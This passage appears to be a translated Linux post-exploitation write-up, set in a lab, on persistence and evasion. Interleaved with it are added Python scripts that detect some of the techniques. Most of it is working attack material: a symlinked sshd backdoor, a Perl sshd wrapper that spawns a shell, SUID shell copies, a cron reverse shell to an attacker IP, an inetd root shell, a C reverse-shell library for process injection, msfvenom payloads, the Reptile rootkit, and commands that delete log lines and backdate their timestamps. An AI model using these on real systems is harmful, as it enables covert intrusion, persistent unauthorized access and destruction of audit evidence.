iptables -D INPUT 1
Flush and delete the LETMEIN chain
iptables -t nat -F LETMEIN
iptables -t nat -X LETMEIN
# delete-chain -X / flush -F
# check that LETMEIN has been removed
iptables -t nat -L LETMEIN -n --line-numbers
Use the earlier view commands to check that the added rules are gone
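To find the port-reuse rules above from the defender's side, this added example (not part of the original write-up) parses iptables-save output, flags nat REDIRECTs to port 22, recent-module set/remove switches and recent-gated jumps, and emits the matching delete commands. The dump is a constructed sample built from the rules listed above (iptables-save prints the target as --to-ports, which the parser accepts alongside --to-port).

```python
import shlex

ADMIN_PORTS = {"22"}  # assumed: ports worth protecting from redirection


def parse_rule(rule_line):
    """Turn an iptables-save rule line ('-A CHAIN ...') into {option: value | True | [values]}."""
    tokens, opts, i = shlex.split(rule_line), {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith("-"):
            i += 1
            continue
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
        value = tokens[i + 1] if has_value else True
        if tok in opts:  # repeated options such as -m tcp -m recent
            opts[tok] = (opts[tok] if isinstance(opts[tok], list) else [opts[tok]]) + [value]
        else:
            opts[tok] = value
        i += 2 if has_value else 1
    return opts


def has_module(opts, name):
    mods = opts.get("-m", [])
    return name in (mods if isinstance(mods, list) else [mods])


def audit_iptables_save(dump):
    """Return (findings, cleanup_commands) for the port-reuse pattern in an iptables-save dump."""
    findings, cleanup, gated_chains, table = [], [], [], None
    for line in dump.splitlines():
        if line.startswith("*"):
            table = line[1:].strip()
            continue
        if not line.startswith("-A "):
            continue
        o = parse_rule(line)
        to_port = str(o.get("--to-ports", o.get("--to-port")))
        flag = None
        if o.get("-j") == "REDIRECT" and to_port in ADMIN_PORTS:
            flag = "REDIRECT to admin port %s" % to_port
        elif has_module(o, "recent") and ("--set" in o or "--remove" in o) and o.get("-j") == "ACCEPT":
            flag = "recent-list switch on dport %s (list %s)" % (o.get("--dport"), o.get("--name"))
        elif has_module(o, "recent") and "--rcheck" in o:
            flag = "recent-gated jump to chain %s" % o.get("-j")
            gated_chains.append((table, o.get("-j")))
        if flag:
            findings.append((table, o["-A"], flag))
            cleanup.append("iptables -t %s -D %s" % (table, line[3:]))
    for tbl, chain in gated_chains:  # flush and delete the custom chain once its rules are gone
        cleanup += ["iptables -t %s -F %s" % (tbl, chain), "iptables -t %s -X %s" % (tbl, chain)]
    return findings, cleanup


# Constructed iptables-save dump reproducing the rule set above.
SAMPLE_DUMP = """# Generated by iptables-save (constructed sample)
*nat
:PREROUTING ACCEPT [0:0]
:LETMEIN - [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
-A LETMEIN -p tcp -j REDIRECT --to-ports 22
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 81 -m recent --set --name letmein --rsource -j ACCEPT
-A INPUT -p tcp -m tcp --dport 82 -m recent --name letmein --remove -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    found, commands = audit_iptables_save(SAMPLE_DUMP)
    for f in found:
        print("[%s] %s: %s" % f)
    print("\n".join(commands))
```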
Hiding processes
CACM
wget https://github.com/RuoJi6/CACM/releases/download/CACM_v2.3.1/CACM_amd64_zh
...
chmod +x CACM
sudo ./CACM
ps aux
hide 124629
Delete the leftover file
rmdir .cacm_124629
Countermeasure:
Because an empty directory is mounted over the process entry, its hard-link count is generally 2 (. and ..), its size is 40, and its permissions also look suspicious
ls -la /proc/ | grep "2 root"
Unhide the process; I had already unmounted mine earlier
umount /proc/119135
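An added example (not from the original write-up) that automates the countermeasure just described: it reads /proc/mounts for anything mounted over /proc/<pid> and checks /proc entries for the link-count-2 / size-40 signature of an empty tmpfs. The sample /proc/mounts and ls output are constructed; scan_live() runs the same two checks on the local host.

```python
import os
import re

PROC_PID_DIR = re.compile(r"^/proc/(\d+)$")


def mounts_over_proc_pids(mounts_text):
    """Parse /proc/mounts text; return {pid: (fstype, source)} for filesystems mounted on /proc/<pid>."""
    hidden = {}
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        source, mountpoint, fstype = parts[:3]
        m = PROC_PID_DIR.match(mountpoint)
        if m:
            hidden[int(m.group(1))] = (fstype, source)
    return hidden


def suspicious_proc_entries(ls_output):
    """Parse `ls -la /proc` lines; return PIDs whose directory has link count 2 and size 40.

    A real /proc/<pid> directory reports size 0 and many links; an empty tmpfs
    directory mounted on top of it shows exactly the 2-link / 40-byte signature."""
    pids = []
    for line in ls_output.splitlines():
        parts = line.split(None, 8)
        if len(parts) != 9 or not parts[0].startswith("d") or not parts[8].isdigit():
            continue
        links, size = parts[1], parts[4]
        if links == "2" and size == "40":
            pids.append(int(parts[8]))
    return pids


def scan_live():
    """Run both checks on the local Linux host; returns (from_mounts, from_listing)."""
    if not os.path.exists("/proc/mounts"):
        return {}, []
    with open("/proc/mounts") as fh:
        from_mounts = mounts_over_proc_pids(fh.read())
    from_listing = []
    for name in os.listdir("/proc"):
        if name.isdigit():
            st = os.lstat(os.path.join("/proc", name))
            if st.st_nlink == 2 and st.st_size == 40:
                from_listing.append(int(name))
    return from_mounts, from_listing


# Constructed samples (the PID values echo the write-up's hide/umount commands).
SAMPLE_MOUNTS = """proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /proc/124629 tmpfs rw,relatime 0 0
/dev/sda1 / ext4 rw,relatime 0 0
"""
SAMPLE_LS_PROC = """dr-xr-xr-x 9 jan  jan   0 Dec 11 08:10 1148
drwxr-xr-x 2 root root 40 Dec 11 08:12 124629
dr-xr-xr-x 9 root root  0 Dec 11 08:10 1
-r--r--r-- 1 root root  0 Dec 11 08:10 uptime
"""

if __name__ == "__main__":
    print("from /proc/mounts:", mounts_over_proc_pids(SAMPLE_MOUNTS))
    print("from ls -la /proc:", suspicious_proc_entries(SAMPLE_LS_PROC))
```

Any PID reported by either check can be unhidden with umount /proc/<pid>, as the write-up does above.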
Backdoors
ssh
Allow PAM authentication
grep -i "usepam" /etc/ssh/sshd_config
Check whether root can log in with a password
grep -in "root" /etc/ssh/sshd_config
Change it to allowed
sed -i '28c\PermitRootLogin yes' /etc/ssh/sshd_config
Find usable symlink names
find /etc/pam.d/sshd | xargs grep "pam_rootok"
sufficient: if this module succeeds, authentication passes immediately
pam_rootok: checks whether the calling process's UID is 0 (root)
Create it via a symlink
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8091
Or, if password login turns out to be disallowed
/tmp/su -oPort=8091 -oPermitRootLogin=yes
Connect
ssh -p 8091 root@192.168.30.172
Removing the symlink backdoor
ps aux | grep "/tmp/su"
kill 382
rm -r /tmp/su
SSH Wrapper
Target
cd /usr/sbin
mv sshd ../bin
echo '#!/usr/bin/perl' > sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart # or systemctl restart sshd
Attacker machine
socat STDIO TCP4:192.168.30.172:22,sourceport=13377
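An added example (not from the original write-up) covering both the symlinked sshd on an alternate port and the Perl wrapper above: it checks that the sshd file on disk is an ELF rather than a script, and that every running sshd has the expected exe path and argv[0] with no -oPort/-oPermitRootLogin overrides. The process tuples and file headers are constructed samples; live_sshd_processes() collects the same tuples from /proc on a real host, and the expected path /usr/sbin/sshd is the one the write-up uses.

```python
import os

EXPECTED_SSHD = "/usr/sbin/sshd"


def classify_executable(head):
    """Classify the first bytes of a file: 'elf', 'script:<interpreter>' or 'unknown'."""
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"#!"):
        words = head.split(b"\n", 1)[0][2:].strip().split()
        interp = words[0] if words else b"?"
        return "script:" + interp.decode(errors="replace")
    return "unknown"


def check_sshd_binary(path=EXPECTED_SSHD, head=None):
    """Return a finding if the sshd on disk is not an ELF (the Perl wrapper trick), else None."""
    if head is None:
        with open(path, "rb") as fh:
            head = fh.read(64)
    kind = classify_executable(head)
    return None if kind == "elf" else "%s is a %s, not an ELF binary" % (path, kind)


def check_sshd_processes(processes):
    """processes: iterable of (pid, resolved_exe, argv).

    Flags any sshd whose exe or argv[0] is not the expected path (a symlink such
    as /tmp/su, or a moved real binary behind a wrapper) and any -o override that
    changes the port or the root-login policy on the command line."""
    findings = []
    for pid, exe, argv in processes:
        if not exe.endswith("/sshd") or not argv:
            continue
        if exe != EXPECTED_SSHD or argv[0] != EXPECTED_SSHD:
            findings.append((pid, "sshd runs as %s with exe %s" % (argv[0], exe)))
        for arg in argv[1:]:
            if arg.startswith("-o") and ("Port=" in arg or "PermitRootLogin=" in arg):
                findings.append((pid, "command-line override %s" % arg))
    return findings


def live_sshd_processes():
    """Collect (pid, exe, argv) for every process on a Linux host whose exe resolves to sshd."""
    result = []
    for name in (os.listdir("/proc") if os.path.isdir("/proc") else []):
        if not name.isdigit():
            continue
        try:
            exe = os.readlink("/proc/%s/exe" % name)
            with open("/proc/%s/cmdline" % name, "rb") as fh:
                argv = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
        except OSError:
            continue
        if exe.endswith("/sshd"):
            result.append((int(name), exe, argv))
    return result


# Constructed samples: a wrapper script header, a minimal ELF header, and three process tuples.
SAMPLE_WRAPPER = b"#!/usr/bin/perl\nexec \"/bin/sh\" if(getpeername(STDIN) =~ /^..4A/);\n"
SAMPLE_ELF = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 56
SAMPLE_PROCS = [
    (1148, "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),
    (382, "/usr/sbin/sshd", ["/tmp/su", "-oPort=8091", "-oPermitRootLogin=yes"]),
    (2201, "/usr/bin/sshd", ["/usr/sbin/sshd", "-D"]),
]

if __name__ == "__main__":
    print(check_sshd_binary(head=SAMPLE_WRAPPER))
    for finding in check_sshd_processes(SAMPLE_PROCS):
        print("pid %d: %s" % finding)
```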
SSH public-key login
Generate a key pair on the attacker machine
ssh-keygen -t rsa
Download the public key on the target machine
wget http://192.168.30.169/.ssh/id_rsa1.pub
Append the public key
cat id_rsa1.pub >> /root/.ssh/authorized_keys
Set the permissions
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
Connect from the attacker machine
SUID
Escalate from an ordinary user login to root
cp /bin/sh /tmp/.sb
chmod +s /tmp/.sb
/tmp/.sb -p
cron
Much the same as editing /etc/crontab with SUID vim, except that with root privileges the commands are much simpler
Run once a minute
echo "* * * * * root chmod +s /bin/bash" >> /etc/crontab
echo "bash -i >& /dev/tcp/192.168.30.169/8881 0>&1" > /root/t.sh
(printf "* * * * * /bin/bash /root/t.sh;\rno crontab for `whoami`%100c\n")|crontab -
Listen
nc -lvvp 8881
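An added example (not from the original write-up) that audits the SUID listing and /etc/crontab for the tricks in the SUID and cron sections: it uses the root-owned SUID list from the write-up's own find output as the baseline, flags interpreters/editors/shells carrying setuid (the dangerous list given earlier) and anything under /tmp or a home directory, and flags cron commands that set the s bit or open a reverse shell. The ls and crontab texts are constructed samples.

```python
# Baseline: the root-owned SUID binaries in the find output earlier in this write-up.
BASELINE_SUID = {
    "/bin/fusermount", "/bin/mount", "/bin/ntfs-3g", "/bin/ping", "/bin/ping6", "/bin/su",
    "/bin/umount", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgidmap",
    "/usr/bin/newgrp", "/usr/bin/newuidmap", "/usr/bin/passwd", "/usr/bin/pkexec",
    "/usr/bin/sudo", "/usr/bin/vim.basic", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/snapd/snap-confine",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
}
# Names the write-up lists as dangerous with SUID (editors, interpreters, pagers...) plus shells.
DANGEROUS_NAMES = {
    "find", "nano", "vim", "vim.basic", "more", "less", "man", "cp", "mv", "awk", "sed", "curl",
    "wget", "cat", "nmap", "perl", "ruby", "gdb", "python", "python3", "bash", "sh", "dash", "zsh",
}
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
CRON_RED_FLAGS = ("chmod +s", "chmod u+s", "chmod 4", "chmod 6", "/dev/tcp/", "bash -i", "nc ", "ncat ")


def parse_ls_line(line):
    """Parse one `ls -la` line: mode links owner group size month day time-or-year path."""
    parts = line.split(None, 8)
    if len(parts) != 9 or not parts[0].startswith("-"):
        return None
    mode = parts[0]
    return {"mode": mode, "owner": parts[2], "group": parts[3], "path": parts[8],
            "suid": mode[3] in "sS", "sgid": mode[6] in "sS"}


def audit_suid(ls_output, baseline=BASELINE_SUID):
    """Return [(path, [reasons])] for setuid/setgid files that deserve a second look."""
    findings = []
    for line in ls_output.splitlines():
        entry = parse_ls_line(line)
        if entry is None or not (entry["suid"] or entry["sgid"]):
            continue
        path, reasons = entry["path"], []
        if path not in baseline:
            reasons.append("not in baseline")
        if path.rsplit("/", 1)[-1] in DANGEROUS_NAMES:
            reasons.append("interpreter/editor/shell with setuid or setgid")
        if path.startswith(USER_WRITABLE):
            reasons.append("lives under a user-writable directory")
        if reasons:
            findings.append((path, reasons))
    return findings


def audit_crontab(crontab_text):
    """Flag system crontab lines (min hour dom mon dow user command) whose command sets the s bit or opens a shell."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)
        if len(fields) != 7 or line.lstrip().startswith("#") or "=" in fields[0]:
            continue
        user, command = fields[5], fields[6]
        hits = [flag for flag in CRON_RED_FLAGS if flag in command]
        if hits:
            findings.append((user, command, hits))
    return findings


# Constructed samples modelled on the listings above.
SAMPLE_LS = """-rwsr-xr-x 1 root root 40152 Nov 30  2017 /bin/mount
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 2437320 Nov 24  2016 /usr/bin/vim.basic
-rwsr-sr-x 1 root root 1037528 Dec 11 08:12 /bin/bash
-rwsr-sr-x 1 root root 125400 Dec 11 08:15 /tmp/.sb
"""
SAMPLE_CRONTAB = """SHELL=/bin/sh
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod +s /bin/bash
"""

if __name__ == "__main__":
    for path, reasons in audit_suid(SAMPLE_LS):
        print(path, "->", "; ".join(reasons))
    for user, command, hits in audit_crontab(SAMPLE_CRONTAB):
        print("cron as %s: %r matches %s" % (user, command, hits))
```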
inetd
apt-get install openbsd-inetd
echo "daytime stream tcp nowait root /bin/bash bash -i" > /tmp/t0;vim -Es -c '$r /tmp/t0' -c 'wq!' /etc/inetd.conf;rm /tmp/t0
# start inetd
sudo inetd
daytime stream tcp nowait root /bin/bash bash -i
# daytime - the service
# stream tcp - TCP stream
# nowait - do not wait; start a new process for every connection
# root - run as root
# /bin/bash - path of the program to run
# bash -i - command the program runs, giving an interactive shell
Connect with nc
daytime can be replaced with any service name or port
sed -i 's/daytime/13453/g' /etc/inetd.conf
sudo inetd
Add a service in /etc/services
echo "wsdy 5678/tcp" >> /etc/services
sed -i 's/13453/wsdy/g' /etc/inetd.conf
sudo inetd
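An added example (not from the original write-up) that parses /etc/inetd.conf and flags entries handing a shell to the network, running as root from a user-writable path, or bound to a raw port number instead of a service name; it also lists /etc/services names missing from a known-good set, which catches the wsdy addition above. The inetd.conf and services texts are constructed samples modelled on the lines in this section.

```python
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/sh"}
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_inetd_conf(text):
    """Yield one dict per active inetd.conf line: service socket proto wait user program [args]."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 6:
            continue
        yield {"service": parts[0], "socket": parts[1], "proto": parts[2], "wait": parts[3],
               "user": parts[4], "program": parts[5], "args": parts[6] if len(parts) > 6 else ""}


def audit_inetd(text):
    """Return [(service, [reasons])] for entries that match the backdoor pattern above."""
    findings = []
    for e in parse_inetd_conf(text):
        reasons = []
        shell = e["program"] in SHELLS or e["args"].split()[:1] in (["bash"], ["sh"])
        if shell:
            reasons.append("hands a shell to whoever connects")
        if e["program"].startswith(UNTRUSTED_DIRS):
            reasons.append("program lives under a user-writable directory")
        if e["user"] == "root" and reasons:
            reasons.append("runs as root")
        if e["service"].isdigit():
            reasons.append("bound to a raw port number instead of a service name")
        if reasons:
            findings.append((e["service"], reasons))
    return findings


def unknown_services(services_text, known_names):
    """Names in /etc/services that are absent from a known-good set (assumed to come from a clean install)."""
    names = {l.split()[0] for l in services_text.splitlines() if l.strip() and not l.startswith("#")}
    return sorted(names - set(known_names))


# Constructed samples.
SAMPLE_INETD = """# constructed sample /etc/inetd.conf
#:STANDARD: These are standard services.
daytime stream tcp nowait root /bin/bash bash -i
13453 stream tcp nowait root /bin/bash bash -i
ident stream tcp wait identd /usr/sbin/identd identd
"""
SAMPLE_SERVICES = "ssh 22/tcp\ndaytime 13/tcp\nwsdy 5678/tcp\n"
KNOWN_SERVICE_NAMES = {"ssh", "daytime"}

if __name__ == "__main__":
    for service, reasons in audit_inetd(SAMPLE_INETD):
        print(service, "->", "; ".join(reasons))
    print("unknown service names:", unknown_services(SAMPLE_SERVICES, KNOWN_SERVICE_NAMES))
```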
ICMP
git clone https://github.com/andreafabrizi/prism.git
apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c
chmod +x prism
Run on the target
sudo ./prism
Run on the attacker machine
./sendPacket.py 192.168.30.172 p4ssw0rd 192.168.30.169 7891 # if it is incompatible, run it in docker
nc -lvvp 7891
DNS
dnscat2
Server
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
gem install bundler
bundle install
Client
cd dnscat2/client/
make
Start the server
ruby dnscat2.rb --no-cache --secret=12345
Connect the client
./dnscat --dns server=192.168.30.169,port=53 --secret=12345
Process injection
Download
git clone https://github.com/gaffe23/linux-inject.git
# compile
make
If libraries are missing at compile time, install the full development toolchain in docker
apt-get update
apt-get install build-essential
apt-get install libc6-dev
apt-get install gcc-multilib
Here a simple script was written with the help of an AI
// reverse.c
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdlib.h>

// The problematic hide_process function was removed to focus on the core functionality
// Reverse shell main function
static void reverse_shell() {
    int sockfd;
    struct sockaddr_in attacker_addr;
    // Set the attacker IP and port (change to your actual IP)
    attacker_addr.sin_family = AF_INET;
    attacker_addr.sin_port = htons(4444); // attacker listening port
    attacker_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // test locally first, then change to your IP
    // Create the socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket创建失败");
        return;
    }
    // Try to connect
    printf("[*] 尝试连接到攻击者...\n");
    if (connect(sockfd, (struct sockaddr*)&attacker_addr, sizeof(attacker_addr)) < 0) {
        perror("连接失败");
        close(sockfd);
        return;
    }
    printf("[+] 连接成功!\n");
    // Redirect stdin, stdout and stderr to the socket
    dup2(sockfd, 0); // stdin
    dup2(sockfd, 1); // stdout
    dup2(sockfd, 2); // stderr
    // Execute the shell
    char *shell = "/bin/sh";
    char *args[] = {shell, "-i", NULL};
    execve(shell, args, NULL);
    // Only reached if execve fails
    perror("execve失败");
    close(sockfd);
}

// Runs automatically when the library is loaded
__attribute__((constructor)) void backdoor_entry() {
    printf("[*] 后门已加载,PID: %d\n", getpid());
    // Fork a child process to run the reverse shell
    pid_t pid = fork();
    if (pid == 0) {
        // Child process
        reverse_shell();
        exit(0); // exit the child if reverse_shell returns
    } else if (pid > 0) {
        // Parent process carries on as normal
        printf("[*] 创建子进程PID: %d执行反向shell\n", pid);
    } else {
        perror("fork失败");
    }
}
gcc -shared -fPIC -o reverse.so reverse.c -nostartfiles
Create a process and inject into it
sleep 3600
# open another session
pgrep sleep
# or: ps aux | grep sleep
./inject -p 24320 ./reverse.so
Vegile
Generate the payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.30.169 LPORT=4449 -b "\x00" -e x64/xor -i 3 -f elf -o backdoor.elf
Upload it and set permissions
chmod +x backdoor.elf
Listen
msfconsole -qx 'use exploit/multi/handler;set payload linux/x64/shell/reverse_tcp;set LHOST 192.168.30.169;set LPORT 4449;run'
apt install gcc
git clone https://github.com/screetsec/Vegile.git
chmod +x Vegile
./Vegile --i backdoor.elf
chmod +x /usr/bin/screetsec /usr/bin/debug /usr/bin/tracker /usr/bin/supervisited /usr/bin/rma
./Vegile --u backdoor.elf
Reptile
Environment
apt install -y gcc g++ make vim unzip
apt-get -y install linux-headers-$(uname -r)
Server
./setup.sh install
# the installation offers the following options:
# Hide name (will be used to hide dirs/files) (default: reptile): name of the directories/files to hide
# Auth token to magic packets (default: hax0r): authentication used when connecting to the backdoor
# Backdoor password (default: s3cr3t): backdoor password
# Tag name that hide file contents (default: reptile): tag name; content inside this tag is hidden
# Source port of magic packets (default: 666): default source port
# Would you like to config reverse shell each X time? (y/n) (default: n): whether to pop a shell periodically (with n the installation proceeds directly and the options below are not shown)
# Reverse IP: controller IP
# Reverse Port: controller port
# would you like to config reverse shell each x time(default:1800): interval between callbacks
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
If you forgot to configure the scheduled callback
/reptile/reptile_reverse -t 192.168.30.169 -p 8883 -s root -r 1800
Client (controller)
./setup.sh client
cd bin
./client
show
#LHOST Local host to receive the shell
#LPORT Local port to receive the shell
#SRCHOST Source host on magic packets (spoof)
#SRCPORT Source port on magic packets (only for TCP/UDP)
#RHOST Remote host
#RPORT Remote port (only for TCP/UDP)
#PROT Protocol to send magic packet (ICMP/TCP/UDP)
#PASS Backdoor password (optional)
#TOKEN Token to trigger the shell
# every option that is empty must be set
set lhost 192.168.30.169
set lport 8883
set rhost 192.168.30.172
set rport 8883
set pass s3cr3t
set token hax0r
set srchost 192.168.30.169
set srcport 666
set prot tcp
run
Covering tracks
Clearing command history
Do not record command history after login
HISTFILE=/dev/null HISTSIZE=0 HISTFILESIZE=0; set +o history; history -c
Note the time at login and at logout
date
History log
cat -n /root/.bash_history
# delete line 101 and everything after it
sed -i '101,$d' /root/.bash_history
# same for other users
System logs
ls -la /var/log
/var/log/btmp records all failed logins; view with the lastb command
/var/log/lastlog records the last login time of every user on the system; view with the lastlog command
/var/log/wtmp records all user logins and logouts; view with the last command
/var/log/utmp records the users currently logged in; view with w, who, users and similar commands
/var/log/secure records security-related log information
/var/log/message records system information and error logs after boot
# delete the lines containing 192.168.30.169
cd /var/log
sed -i '/192\.168\.30\.169/d' auth.log* *tmp syslog* lastlog /run/utmp apache2/access.log
touch -d "2025-12-10 06:24:39.067830158" *tmp syslog* lastlog auth.log* /run/utmp /var/log/apache2/access.log
# delete the lines in the time range Dec 20 04:34:43 ~ Dec 20 04:59:54
sed -i '/^Dec 20 04:34:43/,/^Dec 20 04:59:54/d' auth.log*
Hiding remote SSH login records
When connecting to the target
# do not record the SSH host key in the local .ssh directory
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -o "GlobalKnownHostsFile=/dev/null" -T user@host "exec -a [kworker/u:0] bash -i"